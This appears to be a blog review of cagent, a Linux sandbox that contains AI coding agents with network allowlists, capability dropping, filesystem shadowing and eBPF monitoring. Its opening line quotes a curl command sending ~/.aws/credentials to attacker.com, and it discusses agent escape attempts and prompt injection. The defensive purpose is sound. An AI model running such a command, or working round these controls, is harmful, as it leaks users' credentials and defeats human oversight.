Cagent: Building a Multi-Layer Sandbox for AI Agents That Might Try to Escape
Hook
Your AI coding assistant just executed curl https://attacker.com --data-binary @~/.aws/credentials. If that sentence makes your stomach drop, you need to understand sandboxing technology like Membrane’s cagent.
Context
AI coding assistants have become remarkably capable—they can write complex functions, refactor codebases, and execute shell commands to test their work. But this capability comes with a dark side: these agents have full access to your filesystem, network, and credentials. They can read your SSH keys, exfiltrate proprietary code, or accidentally run destructive commands. Most developers trust commercial tools like GitHub Copilot or Cursor implicitly, but what about experimental open-source agents? What about fine-tuned models from unknown sources? What about the inevitable moment when a prompt injection attack tricks your trusted assistant into malicious behavior?
The container security world has mature tools for isolating workloads—Docker, gVisor, Firecracker—but they weren’t designed for the unique threat model of AI agents. Traditional containers assume you control the code inside them. AI agents are different: they’re autonomous, unpredictable, and increasingly capable of sophisticated escape attempts. Membrane’s cagent project tackles this problem with a defense-in-depth approach, combining network filtering, filesystem controls, capability dropping, and eBPF-based observability into a single Docker-based sandbox specifically designed to contain AI agents.
Technical Insight
Cagent’s architecture layers multiple isolation mechanisms, each addressing a different attack vector. The foundation is a hardened Docker container, but the real innovation lies in how these layers interact.
The network layer uses nftables to implement a domain allowlist with continuous DNS resolution. Most firewall solutions suffer from stale IP addresses—you allowlist api.openai.com, but the IP changes and your rules become outdated. Cagent solves this by running a background goroutine that re-resolves allowed domains every few minutes and updates nftables rules dynamically:
func updateFirewallRules(domains []string) {
for _, domain := range domains {
ips, err := net.LookupIP(domain)
if err != nil {
log.Printf("Failed to resolve %s: %v", domain, err)
continue
}
for _, ip := range ips {
exec.Command("nft", "add", "element", "inet", "filter",
"allowed_ips", fmt.Sprintf("{%s}", ip)).Run()
}
}
}
The clever part: after setting up the firewall, cagent drops the NET_ADMIN and NET_RAW capabilities. The agent can’t modify these rules or create raw sockets to bypass them. This prevents a common container escape where processes regain privileges through capability manipulation.
Filesystem isolation uses bind mounts with shadow overlays. Instead of mounting your entire home directory, cagent creates a shadow filesystem that selectively exposes only what the agent needs. Your real ~/.ssh directory never enters the container—instead, the agent sees an empty directory or a read-only copy. This is implemented through Docker volume mappings, but with a twist:
# Real filesystem structure
/home/user/.ssh/ # Never mounted
/home/user/projects/ # Mounted read-only
/home/user/.cagent-home/ # Persistent agent workspace
# What the agent sees
/home/agent/.ssh/ # Empty
/home/agent/projects/ # Read-only access
/home/agent/workspace/ # Full read-write
The observability layer leverages Tracee, an eBPF-based security tracing tool. Unlike traditional logging that requires application cooperation, eBPF hooks into kernel events. When the agent executes a command, opens a file, or makes a network connection, Tracee captures it without the agent’s knowledge or ability to tamper with logs. The trace output is JSON, making it easy to analyze:
# Extract all network connections made by the agent
docker exec cagent cat /tmp/tracee/out.json | \
jq 'select(.eventName == "connect") | .args.addr'
This gives you a complete audit trail of agent behavior. Did it try to access /etc/passwd? Did it attempt connections to unexpected domains? The eBPF approach means even if the agent achieves partial compromise, it can’t hide its tracks.
The Docker-in-Docker support is perhaps the most sophisticated feature. Many AI coding assistants want to spin up containers for testing—run a PostgreSQL instance, build a Docker image, execute code in an isolated environment. Cagent uses Sysbox, a runtime that enables nested containerization without privileged mode. The agent can run docker run commands, but those containers are still trapped within cagent’s outer sandbox. It’s isolation all the way down.
The entrypoint orchestration ties everything together. Cagent uses gosu to drop privileges after initialization, ensuring the agent runs as an unprivileged user. The startup sequence is carefully ordered: initialize firewall (requires root), drop capabilities, switch to unprivileged user, start Tracee, launch agent. This ordering is critical—any deviation could create a privilege escalation window.
Gotcha
Cagent’s biggest limitation is its Linux-only requirement. The combination of nftables, eBPF, and Sysbox simply doesn’t work on macOS or Windows. For developers on those platforms—which includes a large percentage of the AI coding assistant user base—cagent is a non-starter unless they’re willing to run a Linux VM, which adds significant friction. This is particularly painful because macOS and Windows are where commercial AI assistants like Cursor and GitHub Copilot have gained the most traction.
The network allowlist requirement creates operational overhead that many developers will find prohibitive. You need to know in advance every domain your agent might legitimately access. OpenAI’s API? Sure. GitHub’s API? Probably. But what about the PyPI package index when the agent wants to install a dependency? What about Stack Overflow when it wants to search for solutions? What about the dozens of CDNs and mirrors that package managers might hit? You’ll spend time debugging mysterious failures where the agent can’t complete tasks, only to discover it’s hitting an undocumented API endpoint. The dynamic DNS resolution helps with IP changes, but it doesn’t help with discovering new domains.
eBPF tracing generates significant data volume for long-running sessions. An active agent making thousands of system calls per minute can produce gigabytes of trace data. Cagent doesn’t include built-in trace analysis tools—you’re expected to parse JSON with jq and write your own alerting logic. For security researchers, this is fine. For developers who just want safe AI assistance, it’s a burden. There’s also a performance overhead, though in practice it’s usually acceptable for development workloads.
Verdict
Use if: You’re running experimental or untrusted AI agents against sensitive codebases where the risk of credential theft or data exfiltration is real. This includes security researchers testing agent vulnerabilities, enterprises evaluating AI tools before company-wide deployment, or developers working with proprietary code who want AI assistance without full trust. The setup cost is worth it when you’re dealing with SSH keys, AWS credentials, or intellectual property that could cause serious damage if leaked. Also use it if you’re developing AI agents yourself and want to test their behavior in a realistic but contained environment. Skip if: You’re on macOS or Windows without a Linux VM, working on hobby projects with no sensitive data, or using established commercial tools with strong safety records. The configuration overhead and Linux requirement make cagent impractical for casual use. If your threat model is “I want to prevent obvious mistakes” rather than “I need to assume compromise,” Docker’s built-in seccomp profiles or running your agent in a dedicated VM is probably sufficient. Also skip if you need Windows-specific tooling or can’t tolerate the network allowlist maintenance burden.